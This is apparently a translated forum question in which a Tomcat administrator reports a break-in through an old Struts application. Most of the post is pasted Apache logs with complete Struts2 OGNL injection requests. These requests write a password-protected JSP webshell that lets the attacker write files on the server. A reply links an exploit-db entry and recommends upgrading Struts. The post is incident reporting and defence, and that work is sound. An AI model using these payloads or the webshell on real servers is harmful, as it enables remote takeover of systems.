Java / Tomcat被黑了
我最近在我的tomcat服务器上显示了一些文件显然是黑客企图。 我支持使用struts和ibatis以及其他各种框架的旧应用程序。 创建了三个文件,即实际webapp目录下的system1.jsp,如tomcat/webapps/ROOT/system1.jsp ,以及在tomcat/webapps/system2.jsp和tomcat/webapps/system3.jsp下创建的另外两个文件tomcat/webapps/system3.jsp 。
这些文件的内容很奇怪,看起来它试图创建一个用户帐户,这看起来像是一个长镜头。 struts的设置方式无论如何都无法实际到达那些jsp文件,让我担心的是他们能够创建这些文件的事实。 我怎样才能防止这种情况发生?
这是来自hack的apache日志,以及代码的其余部分,
198.211.11.202 - - [28/Apr/2013:02:05:34 -0500] "GET request!start.do? ('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa) (('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i12)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i13)(('\\43xman.getWriter().println(\\43req.getServletContext().getRealPath(%22\\u005c%22))')(d))&(i2)(('\\43fos\\75new\\40java.io.FileOutputStream(new\\40java.lang.StringBuilder(\\43req.getRealPath(%22\\u005c%22)).append(@java.io.File@separator).append(%22system1.jsp%22).toString())')(d))&(i3)(('\\43fos.write(\\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\\43fos.close()')(d))&t=%3C%25%40page+contentType%3D%22text%2Fhtml%3B+charset%3DGBK%22+import%3D%22java.io.*%3B%22%25%3E%0A%3C%25%21private+String+password%3D%22hehe%22%3B%2F%2F%E6%B7%87%EE%86%BD%E6%95%BC%E7%80%B5%E5%97%99%E7%88%9C%25%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3Ehahahaha%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+bgcolor%3D%22%23ffffff%22%3E%0A%3C%25%0AString+act%3D%22%22%3B%0AString+path%3Drequest.getParameter%28%22path%22%29%3B%0AString+content%3Drequest.getParameter%28%22content%22%29%3B%0AString+url%3Drequest.getRequestURI%28%29%3B%0AString+url2%3Drequest.getRealPath%28request.getServletPath%28%29%29%3B%0Atry%0A%7Bact%3Drequest.getParameter%28%22act%22%29.toString%28%29%3B%7D%0Acatch%28Exception+e%29%7B%7D%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29%21%3Dnull%29%0A%7B%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29.toString%28%29.equals%28%22hehe%22%29%29%0A%7B%0Aif+%28path%21%3Dnull+%26%26+%21path.equals%28%22%22%29+%26%26+content%21%3Dnull+%26%26+%21content.equals%28%22%22%29%29%0A%7B%0A+++try%7B%0A+++++File+newfile%3Dnew+File%28path%29%3B%0A+++++PrintWriter+writer%3Dnew+PrintWriter%28newfile%29%3B%0A+++++writer.println%28content%29%3B%0A+++++writer.close%28%29%3B%0A+++++if+%28newfile.exists%28%29+%26%26+newfile.length%28%29%3E0%29%0A+++++%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+ok%21%3C%2Ffont%3E%22%29%3B%0A+++++%7Delse%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+erry%21%3C%2Ffont%3E%22%29%3B%0A+++++%7D%0A+++%7Dcatch%28Exception+e%29%0A+++%7B%0A+++++e.printStackTrace%28%29%3B%0A+++%7D%0A%7D%0Aout.println%28%22%3Cform+action%3D%22%2Burl%2B%22+method%3Dpost%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3%3E%3Cbr%3E%3C%2Ffont%3E%3Cinput+type%3Dtext+size%3D54+name%3D%27path%27%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3+color%3Dred%3E%22%2Burl2%2B%22%3C%2Ffont%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Ctextarea+name%3D%27content%27+rows%3D15+cols%3D50%3E%3C%2Ftextarea%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+value%3D%27save%21%27%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%22%29%3B%0A%7D%0A%7Delse%7B%0Aout.println%28%22%3Cdiv+align%3D%27center%27%3E%3Cform+action%3D%27%3Fact%3Dlogin%27+method%3D%27post%27%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27password%27+name%3D%27pass%27%2F%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+name%3D%27update%27+class%3D%27unnamed1%27+value%3D%27Login%27+%2F%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%3C%2Fdiv%3E%22%29%3B%0A%7Dif%28act.equals%28%22login%22%29%29%0A%7B%0A++++String+pass%3Drequest.getParameter%28%22pass%22%29%3B%0A++++if%28pass.equals%28password%29%29%0A++++%7B%0A+++++session.setAttribute%28%22hehe%22%2C%22hehe%22%29%3B%0A+++++String+uri%3Drequest.getRequestURI%28%29%3B+++%0A+++++uri%3Duri.substring%28uri.lastIndexOf%28%22%2F%22%29%2B1%29%3B+%0A++++response.sendRedirect%28uri%29%3B%0A++++%7Delse%0A++++%7B%0Aout.println%28%22Error%22%29%3B%0Aout.println%28%22%3Ca+href%3D%27javascript%3Ahistory.go%28-1%29%27%3E%3Cfont+color%3D%27red%27%3Ego+back%3C%2Ffont%3E%3C%2Fa%3E%3C%2Fdiv%3E%3Cbr%3E%22%29%3B%0A++++%7D%0A++++%7D%0A%25%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E HTTP/1.1" 200 12387 198.211.11.202 - - [28/Apr/2013:02:05:35 -0500] "GET /request!start.do?('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43req.getRealPath(%22\\u005c%22))')(d))&(i99)(('\\43xman.getWriter().close()')(d)) HTTP/1.1" 200 29 198.211.11.202 - - [28/Apr/2013:02:05:35 -0500] "GET /request!start.do?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43fos\\75new\\40java.io.FileOutputStream(\\43req.getParameter(%22path%22))')(d))&(i3)(('\\43fos.write(\\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\\43fos.close()')(d))&t=%3C%25%40page+contentType%3D%22text%2Fhtml%3B+charset%3DGBK%22+import%3D%22java.io.*%3B%22%25%3E%0A%3C%25%21private+String+password%3D%22hehe%22%3B%2F%2F%E6%B7%87%EE%86%BD%E6%95%BC%E7%80%B5%E5%97%99%E7%88%9C%25%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3Ehahahaha%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+bgcolor%3D%22%23ffffff%22%3E%0A%3C%25%0AString+act%3D%22%22%3B%0AString+path%3Drequest.getParameter%28%22path%22%29%3B%0AString+content%3Drequest.getParameter%28%22content%22%29%3B%0AString+url%3Drequest.getRequestURI%28%29%3B%0AString+url2%3Drequest.getRealPath%28request.getServletPath%28%29%29%3B%0Atry%0A%7Bact%3Drequest.getParameter%28%22act%22%29.toString%28%29%3B%7D%0Acatch%28Exception+e%29%7B%7D%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29%21%3Dnull%29%0A%7B%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29.toString%28%29.equals%28%22hehe%22%29%29%0A%7B%0Aif+%28path%21%3Dnull+%26%26+%21path.equals%28%22%22%29+%26%26+content%21%3Dnull+%26%26+%21content.equals%28%22%22%29%29%0A%7B%0A+++try%7B%0A+++++File+newfile%3Dnew+File%28path%29%3B%0A+++++PrintWriter+writer%3Dnew+PrintWriter%28newfile%29%3B%0A+++++writer.println%28content%29%3B%0A+++++writer.close%28%29%3B%0A+++++if+%28newfile.exists%28%29+%26%26+newfile.length%28%29%3E0%29%0A+++++%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+ok%21%3C%2Ffont%3E%22%29%3B%0A+++++%7Delse%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+erry%21%3C%2Ffont%3E%22%29%3B%0A+++++%7D%0A+++%7Dcatch%28Exception+e%29%0A+++%7B%0A+++++e.printStackTrace%28%29%3B%0A+++%7D%0A%7D%0Aout.println%28%22%3Cform+action%3D%22%2Burl%2B%22+method%3Dpost%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3%3E%3Cbr%3E%3C%2Ffont%3E%3Cinput+type%3Dtext+size%3D54+name%3D%27path%27%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3+color%3Dred%3E%22%2Burl2%2B%22%3C%2Ffont%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Ctextarea+name%3D%27content%27+rows%3D15+cols%3D50%3E%3C%2Ftextarea%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+value%3D%27save%21%27%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%22%29%3B%0A%7D%0A%7Delse%7B%0Aout.println%28%22%3Cdiv+align%3D%27center%27%3E%3Cform+action%3D%27%3Fact%3Dlogin%27+method%3D%27post%27%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27password%27+name%3D%27pass%27%2F%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+name%3D%27update%27+class%3D%27unnamed1%27+value%3D%27Login%27+%2F%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%3C%2Fdiv%3E%22%29%3B%0A%7Dif%28act.equals%28%22login%22%29%29%0A%7B%0A++++String+pass%3Drequest.getParameter%28%22pass%22%29%3B%0A++++if%28pass.equals%28password%29%29%0A++++%7B%0A+++++session.setAttribute%28%22hehe%22%2C%22hehe%22%29%3B%0A+++++String+uri%3Drequest.getRequestURI%28%29%3B+++%0A+++++uri%3Duri.substring%28uri.lastIndexOf%28%22%2F%22%29%2B1%29%3B+%0A++++response.sendRedirect%28uri%29%3B%0A++++%7Delse%0A++++%7B%0Aout.println%28%22Error%22%29%3B%0Aout.println%28%22%3Ca+href%3D%27javascript%3Ahistory.go%28-1%29%27%3E%3Cfont+color%3D%27red%27%3Ego+back%3C%2Ffont%3E%3C%2Fa%3E%3C%2Fdiv%3E%3Cbr%3E%22%29%3B%0A++++%7D%0A++++%7D%0A%25%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E&path=/opt/tomcat/webapp/ROOT/system2.jsp HTTP/1.1" 200 12387
我相信此处列出的漏洞与您所看到的非常接近: http : //www.exploit-db.com/exploits/14360/
所以它似乎是Struts / XWork框架的一个问题,你应该考虑将其升级到更新的版本。 此特定漏洞报告称2.2.0版修复了此问题。